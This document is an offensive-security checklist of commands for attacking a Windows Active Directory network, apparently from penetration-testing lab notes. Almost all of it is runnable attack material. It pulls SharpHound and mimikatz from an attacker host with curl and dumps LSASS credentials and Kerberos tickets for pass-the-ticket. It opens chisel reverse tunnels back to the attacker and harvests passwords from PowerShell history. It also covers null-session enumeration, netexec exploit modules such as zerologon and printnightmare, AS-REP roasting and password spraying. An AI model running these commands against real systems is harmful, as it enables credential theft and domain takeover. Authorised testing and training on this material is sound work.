Checklist: Windows / Active Directory enumeration and post-exploitation (attacker host is 192.168.45.x in the examples below)

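# --- On the compromised Windows host (PowerShell) ---

# PowerShell command history: PSReadLine writes ConsoleHost_history.txt per user.
# Look in every profile, not only Administrator; a user's history often contains
# passwords typed into net use / runas / Invoke-WebRequest credentials.
ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# If the path differs, the current user's location is given by:
#   (Get-PSReadlineOption).HistorySavePath

# Pivoting with chisel. Attacker side must be started with --reverse for R: forwards:
#   ./chisel server -p 8888 --reverse
# Reverse SOCKS: attacker's 127.0.0.1:9999 becomes a SOCKS proxy into the victim's network.
.\chisel.exe client 192.168.45.x:8888 R:9999:socks
# Reverse single-port forward: attacker's 127.0.0.1:8080 -> victim's 127.0.0.1:80.
# NOTE: without the leading "R:" chisel opens a *local* forward (listens on the
# victim and forwards to the server side), which is rarely what is wanted here.
.\chisel.exe client 192.168.45.x:8888 R:8080:127.0.0.1:80

# BloodHound collection. -c all is noisy (touches every host for sessions/local groups);
# output is a timestamped .zip in the current directory - retrieve it, then delete it.
curl 192.168.45.x/SharpHound.exe -o SharpHound.exe
.\SharpHound.exe -c all

# Credential dumping. Requires a high-integrity (local admin) shell; privilege::debug
# grants SeDebugPrivilege for reading LSASS, token::elevate impersonates SYSTEM.
# Expect AV/EDR to flag the unmodified binary and to alert on LSASS access.
curl 192.168.45.x/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
# Export Kerberos tickets: writes one .kirbi per ticket into the current directory.
# These files are reusable credentials - remove them when done.
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
dir *.kirbi
# Pass-the-ticket: kerberos::ptt is a mimikatz command, run it inside mimikatz,
# then verify with klist before using the ticket.
.\mimikatz.exe "kerberos::ptt <ticket>.kirbi" "exit"
klist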
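# --- From the attacker host (Linux): unauthenticated / null-session enumeration ---

# SMB/RPC enumeration. enum4linux needs an explicit empty user/password for a null
# session; "-u  -p" (no value) makes "-p" the username and silently breaks the run.
enum4linux <IP>
enum4linux -u '' -p '' -a -A <IP>

# LDAP via nmap NSE (rootDSE, naming contexts, anonymous search if allowed).
nmap -p 389 --script="ldap* and not brute" -Pn <IP>

# Anonymous LDAP bind. -x selects simple bind; without it ldapsearch attempts SASL
# and the empty -D/-w credentials are not used. Descriptions frequently hold passwords.
ldapsearch -x -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com"
ldapsearch -x -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i description

# netexec null-session checks. Guest/anonymous access varies per host; if these
# return "STATUS_ACCESS_DENIED" retry with -u 'guest' -p ''.
netexec smb <IP> -u '' -p '' --shares
netexec smb <IP> -u '' -p '' --users
netexec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups
# RID cycling: enumerates domain users/groups through a null SAMR session.
netexec smb <IP> -u '' -p '' --rid-brute
# Crawl readable shares and list files (add --download-flag-style options per netexec docs).
netexec smb <IP> -u '' -p '' -M spider_plus
# Vulnerability / misconfiguration checks. Read each module's description
# (netexec smb <IP> -M <module> --options) before use: exploiting zerologon resets
# the DC machine account password and can break the domain, and gpp_password
# only finds cpassword values in SYSVOL Group Policy Preferences.
netexec smb <IP> -u '' -p '' -M printnightmare
netexec smb <IP> -u '' -p '' -M gpp_password
netexec smb <IP> -u '' -p '' -M spooler
netexec smb <IP> -u '' -p '' -M nopac
netexec smb <IP> -u '' -p '' -M zerologon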

If no credentials turn up, work the enumerated user list: try username-as-password (user:user) combinations, AS-REP roasting of accounts without Kerberos pre-authentication (e.g. `impacket-GetNPUsers` or `netexec ldap <IP> -u users.txt -p '' --asreproast out.txt`), and password spraying / brute force - check the domain lockout policy first (`netexec smb <IP> -u '' -p '' --pass-pol`) so you do not lock accounts out.
